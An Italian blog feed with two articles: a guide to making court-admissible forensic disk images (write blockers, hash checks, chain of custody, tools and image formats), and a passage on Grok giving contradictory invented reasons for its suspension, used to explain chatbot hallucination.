Senza la certezza che le copie prodotte rispettino criteri di integrità e affidabilità, ogni ulteriore analisi rischia di essere messa in discussione in aula. Gli operatori si trovano così investiti di una responsabilità tecnica e legale non trascurabile: sbagliare anche solo una fase del processo può pregiudicare la validità della prova, vanificando sforzi investigativi e gettando ombre sull’intero procedimento penale.

Cos’è la copia forense e quando si utilizza

Definizione operativa di copia forense

Nel lessico della scienza forense digitale, la copia forense rappresenta la riproduzione fedele e completa di tutti i dati presenti su un dispositivo di memoria. Non si tratta mai di una semplice duplicazione di file, bensì di un processo di acquisizione bit a bit, capace di restituire una fotografia esatta del contenuto, compresi quei settori che l’utente considera eliminati o non più esistenti. L’immagine prodotta, spesso denominata bitstream image, include aree allocate e non allocate, directory nascosti, file in corso d’uso e porzioni apparentemente vuote, permettendo anche il recupero di elementi cancellati.

L’obiettivo è chiarissimo: ogni copia deve discostarsi il meno possibile dall’originale, restituendo agli analisti lo stesso scenario che troverebbero agendo direttamente sul dispositivo, ma senza comprometterne l’integrità. Si parla in questo senso di una duplicazione acritica, che congela lo stato dei dati e ne consente una successiva analisi ripetibile, fondamentale per garantire la difesa e la verifica delle procedure in dibattimento.

Scopi principali nella digital forensics

La duplicazione forense viene utilizzata ogniqualvolta vi sia necessità di un esame imparziale su un supporto di memoria digitale—un hard disk, una chiavetta USB, uno smartphone—senza rischiare l’alterazione dei dati originali. Questo riguarda sia indagini penali, che contenziosi civili o ispezioni da parte di autorità garanti. Solo una copia ottenuta secondo standard severi può essere ammessa in giudizio come elemento probante, consentendo di esaminare timeline di accesso, creare correlazioni tra eventi informatici, ricostruire azioni compiute e—soprattutto—difendere la prova da eventuali contestazioni di manomissione.

Nel momento in cui la prova diventa digitale, ogni intervento diretto sull’originale rischia di lasciare tracce non più distinguibili da quelle sospette. Ecco perché si scelgono procedure di copia forense: garantire la piena trasparenza delle operazioni e la possibilità, per ogni parte in causa, di ripeterle e verificarle con strumenti propri.

Cosa rende una copia forense prova valida: requisiti tecnici e legali

Integrità, autenticità e tracciabilità

Perché la duplicazione possa essere considerata valida e utilizzabile in tribunale, non basta ricavare un semplice file d’immagine; vanno assicurati alcuni requisiti non negoziabili. In primo luogo, l’integrità: i dati acquisiti non devono risultare alterati in alcun modo rispetto all’originale. Questo presuppone l’uso di strumenti idonei—quali write blocker hardware o software—capaci di scongiurare qualsiasi scrittura accidentale sulla memoria originaria durante la fase di acquisizione. La tracciabilità richiede che tutte le operazioni vengano eseguite da personale debitamente autorizzato e che ogni passo venga meticolosamente documentato, in modo da poter risalire con precisione a chi ha gestito, quando e come, i supporti e le relative immagini.

L’autenticità viene poi garantita non solo dalla correttezza delle procedure, ma tramite meccanismi oggettivi come il calcolo dell’impronta digitale (hash) della memoria prima e dopo la copia, consentendo il confronto diretto tra i valori e smascherando qualsiasi tentativo di alterazione a posteriori.

Impronta hash e documentazione

L’utilizzo di funzioni hash come md5, SHA1 o SHA256 rappresenta una delle colonne portanti del processo. Prima di avviare l’acquisizione, si calcola il valore hash della memoria da duplicare, lo si annota nel verbale e lo si confronta, a procedura ultimata, con l’hash ricavato dal file immagine ottenuto. Solo opportuni match garantiscono che la copia eseguita sia effettivamente speculare all’originale. Ogni scostamento diventa un alert che va investigato.

Non meno importante è la verbalizzazione dettagliata: tempi, persone coinvolte, strumenti impiegati, settaggi selezionati, eventuali criticità riscontrate (come settori danneggiati), risultano ciascuno parte integrante di una catena documentale che accompagna la prova digitale dalla sua acquisizione fino alla presentazione in giudizio. Così facendo, si crea una catena di custodia solida e inattaccabile, requisito fondamentale per resistere a qualsiasi impugnazione o richiesta di rianalisi da parte delle difese.

Come effettuare una copia forense: procedure operative

Step pratici per l’acquisizione

L’esecuzione materiale di una duplicazione forense prevede alcuni passaggi imprescindibili, scanditi da norme tecniche e consuetudini consolidate. Si parte sempre collegando il dispositivo sorgente a una macchina di acquisizione dotata di write blocker, assicurando che nessun comando di scrittura possa accidentalmente modificare il contenuto della memoria. Gli operatori selezionano poi lo strumento software o hardware più adatto, impostando i parametri specifici: formato di output, eventuale compressione, suddivisione in file (utile per superare limiti di filesystem), destinazione sicura per il salvataggio dell’immagine.

Dopo la configurazione, si procede all’acquisizione vera e propria. Il tempo richiesto varia sensibilmente a seconda della dimensione del supporto, dal formato scelto (raw versus compressi come EWF o AFF) e dalle caratteristiche della macchina impiegata. Non è raro che l’operazione occupi svariate ore, specie quando si tratta di server, unità RAID o smartphone particolarmente capienti.

Verifica e controllo dell’integrità

Terminata la copia, la verifica dell’integrità si concretizza ricavando nuovamente il valore hash sul file immagine creato e confrontandolo con quello calcolato sull’originale. L’uguaglianza è condizione imprescindibile perché la procedura sia ritenuta valida. Ove necessario, si consiglia anche il controllo delle dimensioni: un file immagine raw, per esempio, deve risultare grande esattamente quanto la memoria di origine, pena il rischio che qualche settore non sia stato incluso.

Durante la stessa fase, si annotano eventuali anomalie come settori danneggiati o difficoltà di accesso. Ogni dettaglio—tumori logici, presenza di porzioni irrecuperabili, discrepanze segnalate dagli strumenti—va registrato sia a fini di trasparenza sia per premunirsi da future contestazioni. Per prassi, la copia integrale del supporto viene conservata in ambienti protetti e isolati, autorizzando solo personale designato all’accesso e al trasferimento della prova.

Strumenti e formati per la creazione di copie forensi

Hardware e software specifici

Il ventaglio di strumenti a disposizione è ampio e si arricchisce costantemente con l’avanzare delle tecnologie. Tra i dispositivi hardware, spiccano soluzioni come il Tableau TD3 o il Logicube Falcon, in grado di acquisire immagini in autonomia, operando ad alta velocità e producendo già le relative impronte hash. Sul fronte software, si distinguono Guymager, dcfldd, dc3dd e il più versatile dd (tipicamente utilizzati su live system come DEFT o Caine). Ogni soluzione offre vantaggi e specificità: alcuni permettono una configurazione dettagliata dei parametri di acquisizione, altri automatizzano la compressione o la suddivisione in file di dimensioni predefinite.

La scelta dell’uno o dell’altro strumento dipende dal tipo di dispositivo da analizzare, dalla necessità di esportare i dati verso determinati formati e dalle policy operative adottate dal laboratorio forense o dall’ente incaricato dell’analisi.

Formati immagine (EWF, AFF, raw, split raw)

Quando si parla di formati, la distinzione principale è tra immagini non compresse (raw), che mantengono esattamente la dimensione e la struttura della memoria originale, e formati compressi come EWF (EnCase Evidence File) o AFF (Advanced Forensic Format), pensati per ridurre lo spazio d’archiviazione senza sacrificarne la validità forense. Formati come .e01, .ad1 o .dd rispecchiano regole e peculiarità proprie: EWF è spesso preferito per la gestione di grandi volumi, grazie alla possibilità di integrare compressione e metadati, mentre il formato raw (file .dd) resta la soluzione più trasparente, pur richiedendo maggiore capacità di storage.

Nei casi in cui il filesystem di destinazione limiti la dimensione dei file (si pensi a FAT32 o alle policy di cloud storage), si utilizza la suddivisione in più parti (split), tipicamente da 2 a 4 GB ciascuna. Questa strategia non altera il contenuto acquisito, ma facilita la movimentazione dei dati e la loro conservazione su diversi supporti fisici o remoti.

Cautela e best practice: cosa non deve mai mancare in una copia forense

Catena di custodia e privacy

Ogni fase dell’acquisizione deve essere tracciata con meticolosità—dall’assegnazione dell’operatore al rilascio del verbale finale. Questa documentazione, chiamata comunemente catena di custodia, permette di ricostruire puntualmente ogni passaggio, garantendo che la prova sia rimasta nelle mani di personale autorizzato. Allo stesso tempo, il rispetto della privacy e la gestione riservata delle informazioni personali contenute nei dispositivi sottoposti a copia impongono ulteriori accortezze: l’elaborazione dei dati estratti deve avvenire in ambienti protetti, con accessi monitorati e il coinvolgimento esclusivo di figure certificate e adeguatamente formate.

Nel caso di copie multiple—per esempio per la difesa, l’accusa e il giudice—si impone la medesima accuratezza: ogni duplicato deve essere identificabile inequivocabilmente tramite hash e verbale, altrimenti si rischia la perdita di valore probatorio. La responsabilità dell’operatore, anche sotto il profilo penale, è diretta: errori, omissioni o vizi di forma possono compromettere irrimediabilmente la prova digitale.

Errori da evitare e casi particolari

Le insidie sono numerose e spesso si celano nei dettagli. Maneggiare direttamente l’originale senza protezione, non verificare le impronte hash o omettere la tracciabilità di passaggi e accessi può determinare l’esclusione della prova o, peggio, l’invalidazione dell’intera attività investigativa. Particolare attenzione va dedicata ai dispositivi portatili: la fusione di memorie, il rischio di sincronizzazione automatica, l’eterogeneità dei sistemi operativi richiedono tool e accorgimenti specifici, che devono essere puntualmente descritti nei rapporti tecnici. Di fronte all’impossibilità di un accesso immediato alla memoria, ad esempio per motivi tecnici o per consentire perizie contraddittorie, occorre coinvolgere tempestivamente tutte le parti, annotando limiti, tempistiche e criticità nel verbale di acquisizione.

Altrettanto essenziale è la gestione tempestiva del sequestro e della restituzione dei dispositivi originali: il mancato rispetto della proporzionalità e della tempistica può costituire motivo di impugnazione da parte degli interessati. In ogni caso, la copia integrale su dispositivi nuovi e privi di dati pregressi resta un dogma imprescindibile.

Eseguire copie forensi per diversi tipi di dispositivi

PC e laptop

Quando si interviene su computer e portatili, la procedura standard prevede il collegamento del disco a un sistema di acquisizione mediante write blocker, per produrre una copia completa della memoria. In questa fase è fondamentale raccogliere non solo file utente, ma anche log di sistema, registro eventi e spazi non allocati, dai quali spesso emergono tracce residue di operazioni precedenti. L’immagine così prodotta—verificata tramite hash—permette di ricostruire timeline dettagliate e attribuire con precisione responsabilità a utenti e attività.

Smartphone e dispositivi mobili

Lo scenario cambia nettamente quando si affronta la duplicazione di dati da cellulari e tablet. In questi casi, per ragioni tecniche e di sicurezza, si accede spesso solo a un sottoinsieme delle informazioni: chiamate, SMS, rubrica, messaggistica e—quando possibile—contenuti di app. Software specializzati come Cellebrite o Oxygen Forensic Detective consentono procedure guidate, ma occorre segnalare nel rapporto quali informazioni sono state effettivamente estratte e quali, invece, risultano inaccessibili per policy, lockout di sicurezza o limiti hardware.

Cloud, email e social network

L’era delle piattaforme in cloud e delle comunicazioni sempre più smaterializzate impone un’ulteriore attenzione procedurale. Nel caso dei servizi online, acquisire una copia forense significa spesso agire con privilegi amministrativi (funzionalità eDiscovery) o con permessi concessi dall’utente, per esportare interi account o singoli filtri di interesse. Può trattarsi di backup integrali delle caselle email, archivi personali, dati rimasti nella cache dei social network. In questi casi è basilare registrare il contesto temporale esatto—dato che i contenuti mutano costantemente—e annotare limitazioni, rischi di mismatch tra utenti e criteri di raccolta adottati.

Solo una meticolosa documentazione delle fonti, dei metodi impiegati e delle potenziali criticità consente a tutte le parti coinvolte di avere la certezza che la prova digitale rimanga utilizzabile e replicabile anche a distanza di mesi o anni. La storia della forensica informatica ci insegna che la cura dei dettagli non è mai eccessiva: ogni passaggio, ogni accortezza, può fare la differenza tra una prova forte e un elemento destinato a cadere alla prima contestazione processuale.

Nel panorama giuridico odierno, la validità della duplicazione digitale non si misura solo nell’efficienza degli strumenti impiegati, ma nella scrupolosità con cui ogni fase viene gestita, documentata e conservata. Solo la piena aderenza a procedure riconosciute, e la capacità di ricostruire ogni operazione in modo trasparente e ripetibile, garantiscono all’operatore di produrre prove inattaccabili, degne di fiducia sia per i tribunali sia per la collettività. E la copia forense, in questo contesto, rimane lo standard d’eccellenza: baluardo della correttezza investigativa e strumento chiave per illuminare la verità digitale, là dove i dati rischiano di perdersi o di essere manipolati.

L'articolo Copia forense: requisiti, strumenti e procedure per prove digitali in ambito giudiziario proviene da Luca Mercatanti.

Un caso emblematico si è verificato con Grok, il chatbot di xAI. All’improvviso, il sistema è stato sospeso dalla piattaforma X. Quando gli utenti hanno chiesto spiegazioni al sistema stesso, Grok ha fornito motivazioni completamente diverse tra loro: in un caso ha detto di essere stato bloccato per aver accusato Israele e gli Stati Uniti di genocidio a Gaza, in un altro per presunte violazioni di norme su contenuti per adulti, e ancora per segnalazioni legate a messaggi d’odio.
In realtà, Elon Musk ha poi chiarito che la sospensione era dovuta a un “errore stupido” e che il chatbot non aveva alcuna conoscenza reale della causa.

Questo episodio dimostra un punto cruciale: i chatbot non hanno consapevolezza delle proprie azioni. Non sono in grado di spiegare il loro funzionamento o il motivo per cui accade qualcosa. Si limitano a generare frasi statisticamente plausibili sulla base dei dati di addestramento.

Perché i chatbot hanno le allucinazioni

I modelli di AI generativa funzionano con logiche probabilistiche: prevedono la parola più probabile da generare. Questo comporta che i modelli linguistici abbiano quelle che vengono chiamate “allucinazioni” (AI hallucination): il termine è usato per descrivere quando un modello di intelligenza artificiale generativa, come un chatbot o un sistema di text-to-image, produce un contenuto che sembra plausibile ma non ha alcun fondamento reale.
Questo comporta altresì che i LLM:

• non possono spiegare davvero se stessi;
• non hanno memoria consapevole delle loro istruzioni interne;
• inventano risposte quando non sanno cosa dire.

Senza documentazione trasparente su dati di addestramento, system prompts e meccanismi di revisione, è impossibile distinguere tra ciò che l’AI ha appreso e ciò che semplicemente inventa.
Senza una documentazione chiara fornita dagli sviluppatori — che indichi i dati di addestramento, le istruzioni iniziali e le modalità di revisione umana — non è possibile sapere cosa realmente accada all’interno del modello.

Un chatbot potrà anche sembrare onesto, ma il suo mestiere non è dirti la verità: è generare la risposta più probabile.

L'articolo le AI non sanno davvero ciò che dicono proviene da Luca Mercatanti.